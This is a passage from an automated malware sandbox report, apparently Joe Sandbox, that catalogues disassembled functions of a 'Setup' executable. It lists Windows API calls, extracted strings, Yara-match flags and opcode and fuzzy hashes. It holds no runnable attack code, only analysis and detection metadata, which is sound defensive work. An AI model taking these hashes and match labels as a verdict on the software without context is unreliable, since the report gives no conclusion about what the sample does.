Instruction Fuzzy Hash: 85F04F32304A028BDB21A72EC885AEB62F59F84368B14443FE415CB765EB7CDCD58758

Function 004241A4 Relevance: 3.0, APIs: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 004241AB

Part of subcall function 00423A94: EnumWindows.USER32(00423A2C), ref: 00423AB8
Part of subcall function 00423A94: GetWindow.USER32(?,00000003), ref: 00423ACD
Part of subcall function 00423A94: GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
Part of subcall function 00423A94: SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12

SetActiveWindow.USER32(?,?,?,00423D83,00000000,0042416C), ref: 004241BF

Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Window$ActiveEnumIconicLongShowWindows
String ID:
API String ID: 2671590913-0
Opcode ID: 548c1371db5ef4c0c17b9a522ca0bf08e6ca127860c871a9e63ea88f43f493a6
Instruction ID: ffd443eaca36288e12b0fd3e34cf0737071334a0f5e631569de285e60205db71
Opcode Fuzzy Hash: 548c1371db5ef4c0c17b9a522ca0bf08e6ca127860c871a9e63ea88f43f493a6
Instruction Fuzzy Hash: 02E0E5A470010187EF00EFAAD8C9B9662A9AB48304F55057ABC08CF24BDA78C954C724

Function 02FC829E Relevance: 2.9, Strings: 2, Instructions: 392COMMON

Download Yara Rule

Strings

Y, xrefs: 02FC8681
(-.o, xrefs: 02FC836D

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: (-.o$Y
API String ID: 0-3975210238
Opcode ID: 2f3dfaed801559efca6938bc015804192e3f53aaafdfcc31df2e3761952bafd2
Instruction ID: 192e114fcbe97db0e606191e9595c21e5fa1b4e55a53ea18d0796075bb1d2c74
Opcode Fuzzy Hash: 2f3dfaed801559efca6938bc015804192e3f53aaafdfcc31df2e3761952bafd2
Instruction Fuzzy Hash: 51B16872A083528BEB15DF2489427ABB792EFC53C4F29853CEA868B385D735DC05C791

Function 02FA5AEE Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

), xrefs: 02FA5B69
IEND, xrefs: 02FA5EDF

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: 192c2bb5049d3354f85c5a0436fdee30d126ef8f36cb1cce15eec807ff6746b4
Instruction ID: b0b9738b2147263f8817d319cf8294b23aa01bf8c7c8822746afc02feb17d2d3
Opcode Fuzzy Hash: 192c2bb5049d3354f85c5a0436fdee30d126ef8f36cb1cce15eec807ff6746b4
Instruction Fuzzy Hash: 5FD1ACB1A083449FD720CF18C894B5ABBE4EF94344F54492DFA999B381D7B5E908CF92

Function 02FADFA1 Relevance: 2.8, Strings: 2, Instructions: 266COMMON

Download Yara Rule

Strings

?C, xrefs: 02FAE0C6
DE, xrefs: 02FAE319

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: DE$?C
API String ID: 0-353998194
Opcode ID: ef1cf972215bdc8c0bc29a5e7f7c6cd2b62f4c9deeff44dc2325ac8eb1e142dc
Instruction ID: cda0549048582b18f92e0abbf87c6a0770a438950e36749707030fc4ea707c04
Opcode Fuzzy Hash: ef1cf972215bdc8c0bc29a5e7f7c6cd2b62f4c9deeff44dc2325ac8eb1e142dc
Instruction Fuzzy Hash: FE9101B188D3E18FE3358F6488907EBBFE1ABD6314F098A6CC5D85B242D7790509CB56

Function 02FDFEEE Relevance: 2.7, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

@, xrefs: 02FDFFAB
<;:9, xrefs: 02FDFFC9

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: <;:9$@
API String ID: 0-663980302
Opcode ID: 057ee44d2a0d27b95a0ca771afd6e390983fd8e0f91c1fe3f7bea164d29f8273
Instruction ID: 5ba626079cb29c7e29a67bff8d5842710ab75487f79dc499a68db5f438a3521b
Opcode Fuzzy Hash: 057ee44d2a0d27b95a0ca771afd6e390983fd8e0f91c1fe3f7bea164d29f8273
Instruction Fuzzy Hash: 46412CB2A053108BDB19CF14C89177BB3E2FFD5354F19422CDA9A57390DB759904C792

Function 00430BDC Relevance: 2.1, APIs: 1, Instructions: 557COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,-CBE63293), ref: 00430F2D

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b2c4ebec64cb8014716d3ffca2e51ecfa14e62617292f0a48e8d755feb8edb41
Instruction ID: 5897b9315d3f487b970355a29e796db856b5e3d91d02a63f190c56cf2c39d2ee
Opcode Fuzzy Hash: b2c4ebec64cb8014716d3ffca2e51ecfa14e62617292f0a48e8d755feb8edb41
Instruction Fuzzy Hash: DC02F277D147208BD358EFBEEC8615A3761FBA0319346823FD846C7166DE385D428A8E

Function 00430C0C Relevance: 2.0, APIs: 1, Instructions: 546COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,-CBE63293), ref: 00430F2D

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 5cdcb60dbf23868eea3fdf6ad33e4a5a4f799665e4ec938ccc83b41f2b9aa789
Instruction ID: a0d6cb713ba8a94c54512e23cf78d0d0012266b4a005d62f103b33cf29ffe1b7
Opcode Fuzzy Hash: 5cdcb60dbf23868eea3fdf6ad33e4a5a4f799665e4ec938ccc83b41f2b9aa789
Instruction Fuzzy Hash: E002F377D147208BD354EFBEEC8615A3751FBA0318346813FD846C7166DE385D428A8E

Function 004125E8 Relevance: 1.7, APIs: 1, Instructions: 188nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127E5), ref: 004127D3

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 8f926a1adbd2f49b4c8ae7c0839a2ad5f9e0566e4d76f759a68bfdadff11947b
Instruction ID: b8ba5a3252dd9dd8755954997f8cc70cf1688dd1015ecfd52c1097a8d2c67521
Opcode Fuzzy Hash: 8f926a1adbd2f49b4c8ae7c0839a2ad5f9e0566e4d76f759a68bfdadff11947b
Instruction Fuzzy Hash: 995106316082058FC710DB6AD681A9BF3E5FF98304B2482BBD854C7392D7B8EDA1C759

Function 00430CA8 Relevance: 1.7, APIs: 1, Instructions: 179COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,-CBE63293), ref: 00430F2D

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: c8b94d5231146027e081f2c9ed4daefba37d32ffb613a724681a7c47eb8a1032
Instruction ID: acfdc52a0ce3c757b269765e5e8cda59d4b5f9021b20b4e63ebbd46eadeabb0b
Opcode Fuzzy Hash: c8b94d5231146027e081f2c9ed4daefba37d32ffb613a724681a7c47eb8a1032
Instruction Fuzzy Hash: EC51F473C143208B9754FFBEEC4715A36A1EBA1309346923FE846D7126DE385D42868E

Function 004776DC Relevance: 1.6, APIs: 1, Instructions: 107nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0047782A

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 7c14564522473b360c4839aa21112e6689933f57337e1bc3e761502793c93e1c
Instruction ID: 2dd525ea0bd0e215e4ec5d52a323d7dc26d8735cacf0c835bff5f74eef0b1e04
Opcode Fuzzy Hash: 7c14564522473b360c4839aa21112e6689933f57337e1bc3e761502793c93e1c
Instruction Fuzzy Hash: C0412639608104DFCB14CFA9C2848AABBF5FB48310BB5C996E848DB305D338EE41DB95

Function 02FCAE8B Relevance: 1.6, Strings: 1, Instructions: 350COMMON

Download Yara Rule

Strings

^, xrefs: 02FCB11B

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: ^
API String ID: 0-1590793086
Opcode ID: 38a371e2d7121edc847e6926d40f88893a4de18516eb13519464c207e4757c8b
Instruction ID: 8f724d431c31b58e3d464ff3c464e83f8cf84bc8b4fe2e5bfd94143e20af6600
Opcode Fuzzy Hash: 38a371e2d7121edc847e6926d40f88893a4de18516eb13519464c207e4757c8b
Instruction Fuzzy Hash: 74D1B0B080C3819FD724CF68C88176BBBE2EF81344F14896DE6E98B296D735D509CB56

Function 0043125C Relevance: 1.6, Strings: 1, Instructions: 320COMMON

Download Yara Rule

Strings

lloc, xrefs: 00431683

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID: lloc
API String ID: 0-665313897
Opcode ID: 3679dc12fe939a8f052ead3cdf030cc04e7aa3932ea2745fc1adc81aa4f54bcb
Instruction ID: 829e5e46a1ba6f5b3c8df156a1c3478511f92ee220e37862405eaae43eabccc4
Opcode Fuzzy Hash: 3679dc12fe939a8f052ead3cdf030cc04e7aa3932ea2745fc1adc81aa4f54bcb
Instruction Fuzzy Hash: EBB1F3329147258FD348EF7EEC8615A37A2FBA0314382863FD457C7566DB381D428A8E

Function 02FBA359 Relevance: 1.6, Strings: 1, Instructions: 309COMMON

Download Yara Rule

Strings

Empty, xrefs: 02FBA64F

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: Empty
API String ID: 0-2835747520
Opcode ID: a128aadf0e63f46bea5e013efc25c87434b5206cac77e769c63e2f340ef40e21
Instruction ID: c58845b3e07eb39f14387dfdcc685c1bae388f9f8c28dd06737f8f76d6dd1a50
Opcode Fuzzy Hash: a128aadf0e63f46bea5e013efc25c87434b5206cac77e769c63e2f340ef40e21
Instruction Fuzzy Hash: B98122759183118BC725CF29C8917ABB7F2FF81750F09995DE8D58B394EB389806CB42

Function 00444DC8 Relevance: 1.5, Strings: 1, Instructions: 290COMMON

Download Yara Rule

Strings

D9D, xrefs: 00444F41, 00444F2B, 00444F4B, 00444F33

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID: D9D
API String ID: 0-4159173693
Opcode ID: 01632406c449bf630351d5dea61d173a6d29b6378405694112f816b2f1c88a90
Instruction ID: 775bfa19ac091da49b91ecc1553dd6fdcc888bea90cd7b09b03dd4d60e44e3f1
Opcode Fuzzy Hash: 01632406c449bf630351d5dea61d173a6d29b6378405694112f816b2f1c88a90
Instruction Fuzzy Hash: 69C11674E00609DFEB04DF99C585A9EF7F1AF48314F24C1AAE415AB362C738EE019B59

Function 02FBE91E Relevance: 1.5, Strings: 1, Instructions: 284COMMON

Download Yara Rule

Strings

~, xrefs: 02FBE9F3

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: a699a28f2df6d19487ddeafb2f2b08fd72169b2b1fd2baabb1621d548a6507aa
Instruction ID: 864d6ef91bd5d2e5a802f7d1e655095fbcb6f059f3bb39c7ff8c3c3bcd82a87b
Opcode Fuzzy Hash: a699a28f2df6d19487ddeafb2f2b08fd72169b2b1fd2baabb1621d548a6507aa
Instruction Fuzzy Hash: D5912B32A042614FCB26CE2988503DABBD1AF85264F09C27DDDAA9B3D1C774DC4AC7D1

Function 004085BC Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087BE,?,?,?,00000000,00408970), ref: 004085CF

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 2d77612d1523eb37631c9fe43f6b630dec9df2f56849ab23a04fc8dde98aa72e
Instruction ID: 80a94130987eb08e31fff0469d76f06a11846a63295876a610615df4591eed4b
Opcode Fuzzy Hash: 2d77612d1523eb37631c9fe43f6b630dec9df2f56849ab23a04fc8dde98aa72e
Instruction Fuzzy Hash: C9D05E6630E2547AE320525A2E89DBB5AACCAC57B4F10403EB988D6242DA24CC069375

Function 00454AC8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?), ref: 00454ADE

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 9bd4b3c3cd93b33f15f41ddc4070b4672062d5f2504028d60e03be6cf849f481
Instruction ID: c04b0fe41e9d582a91f18bf87f4876ef3bc983a53d138609a9f38525333297d5
Opcode Fuzzy Hash: 9bd4b3c3cd93b33f15f41ddc4070b4672062d5f2504028d60e03be6cf849f481
Instruction Fuzzy Hash: 12D01D7574420067D700AAA9AC81696758D4784315F00453F7DC5DA2C3F5BDDA885656

Function 0042F394 Relevance: 1.5, APIs: 1, Instructions: 17nativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F3B0

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: NtdllProc_Window
String ID:
API String ID: 4255912815-0
Opcode ID: 069c437945be523a3f28a8bd03f85629ae2539989d2ead7f7b8b26c1521ccfe8
Instruction ID: f6c568c4939315a2eda578795105166964a56c952c5b5facb2271ccc97efa3bd
Opcode Fuzzy Hash: 069c437945be523a3f28a8bd03f85629ae2539989d2ead7f7b8b26c1521ccfe8
Instruction Fuzzy Hash: B8D05E7221010D6B8B00DE99D840C6F33AC9B88700BA08825F948C7205C634EC108BA4

Function 02FBFECE Relevance: 1.5, Strings: 1, Instructions: 204COMMON

Download Yara Rule

Strings

lEZ[, xrefs: 02FBFECE

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: lEZ[
API String ID: 0-2584274222
Opcode ID: 72da553f7d6afbacc7ecd46b3c2a9b24d5de9ef38adf5bcfa054932e969929b0
Instruction ID: 3174376cad218ddc68a11a321958e8ac1be33528234284ac7bc99936517103ea
Opcode Fuzzy Hash: 72da553f7d6afbacc7ecd46b3c2a9b24d5de9ef38adf5bcfa054932e969929b0
Instruction Fuzzy Hash: 6D6180319083918FD7258F38CC50A2E7BD1AF95314F09827DF9D947792CA71D806CB52

Function 02FD3B7E Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

5!Yt, xrefs: 02FD3B87

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: 5!Yt
API String ID: 0-3811551328
Opcode ID: 1446b123435ddc69cf7b8a20e7af85ce7ae046032bab767d75d81920618aec0d
Instruction ID: 318aed5d3cfdd15fbabb17cfb447ce4080e2808d8785fa9fae5e66205bb5555d
Opcode Fuzzy Hash: 1446b123435ddc69cf7b8a20e7af85ce7ae046032bab767d75d81920618aec0d
Instruction Fuzzy Hash: DB51F737B5999047D328893C4C563A6BAC34FD2274B2D87BAB3B5CB3F4D69988018751

Function 00431424 Relevance: 1.4, Strings: 1, Instructions: 198COMMON

Download Yara Rule

Strings

lloc, xrefs: 00431683

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID: lloc
API String ID: 0-665313897
Opcode ID: 41bf1cd97118c8f10b8ed74143cb023b9b4b68a518eb45a69ee70b8141c9ea49
Instruction ID: 81f98a7be1f843e7315d9e869727603a67e34ebc3fc772e31e94783337e5a489
Opcode Fuzzy Hash: 41bf1cd97118c8f10b8ed74143cb023b9b4b68a518eb45a69ee70b8141c9ea49
Instruction Fuzzy Hash: 7861C1729117258FD358EF7EEC8606A3BA1F7A5304386823FD41787565DF381D428A8E

Function 02FC7A6B Relevance: 1.4, Strings: 1, Instructions: 181COMMON

Download Yara Rule

Strings

VCQA, xrefs: 02FC81F8

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: VCQA
API String ID: 0-528851432
Opcode ID: 7ae4524af87f57cf3760e8058d35a2f0c05198abf88b05f14d83b24856dfb9d1
Instruction ID: 95c880acf909824b4365f8a27e59f1f38ee321513449683395fd64c95d9faef4
Opcode Fuzzy Hash: 7ae4524af87f57cf3760e8058d35a2f0c05198abf88b05f14d83b24856dfb9d1
Instruction Fuzzy Hash: 8E514B21A8C3428FE7228B288A801A6B7D2EF912E0F1D877DD6950B3D6D3359909D751

Function 02FE017E Relevance: 1.4, Strings: 1, Instructions: 165COMMON

Download Yara Rule

Strings

<;:9, xrefs: 02FE019E

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: <;:9
API String ID: 0-3375088645
Opcode ID: 05773ffd4d400c055cc90ed38a7631caf4120d265a491a09d5fa501113b4d73b
Instruction ID: 77ecb46d0d56612ca91302240163df316c5d748918ccc1c4d3aedbcf9f66bffa
Opcode Fuzzy Hash: 05773ffd4d400c055cc90ed38a7631caf4120d265a491a09d5fa501113b4d73b
Instruction Fuzzy Hash: 57412636F043109BEB258E64CC81B7BB3D6A7C9754F19453CEA8AB7290DBA0EC40C785

Function 02FE031E Relevance: 1.4, Strings: 1, Instructions: 162COMMON

Download Yara Rule

Strings

<;:9, xrefs: 02FE033E

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: <;:9
API String ID: 0-3375088645
Opcode ID: 855515b52b09b4dabe03e6762044e21f6fdcb16798b181e6c8169bd619084ca3
Instruction ID: 26355e4b9eea1eba830243ec77e5e8272bebf8da30a460fcdbfe411bd207150b
Opcode Fuzzy Hash: 855515b52b09b4dabe03e6762044e21f6fdcb16798b181e6c8169bd619084ca3
Instruction Fuzzy Hash: 63412837F043119FD7218E65CD81B3BB3D6ABC9754F19453CEA8AB7290DBB09C408691

Function 004314F4 Relevance: 1.4, Strings: 1, Instructions: 147COMMON

Download Yara Rule

Strings

lloc, xrefs: 00431683

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID: lloc
API String ID: 0-665313897
Opcode ID: 6f918dbe365c3419544756f03fb31fd28704e4cc4cbc0c975d467531f26a41bf
Instruction ID: c4c772154bea5a89026fa6a322472878f7083037288c122ed35be62493051901
Opcode Fuzzy Hash: 6f918dbe365c3419544756f03fb31fd28704e4cc4cbc0c975d467531f26a41bf
Instruction Fuzzy Hash: 5651B1728117209FD348EF7EEC8216A7BA1FBA5304382813FD41687576DF381D428A8D

Function 0043153C Relevance: 1.4, Strings: 1, Instructions: 125COMMON

Download Yara Rule

Strings

lloc, xrefs: 00431683

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID: lloc
API String ID: 0-665313897
Opcode ID: 6ca33d5117218d74260674706c076cca9a55e9317f023628dd073930c886de17
Instruction ID: 9e24dc6b386fa41025a5df2c58fddd52b1451a29a4cc3bf9a61e3b3c1bce8943
Opcode Fuzzy Hash: 6ca33d5117218d74260674706c076cca9a55e9317f023628dd073930c886de17
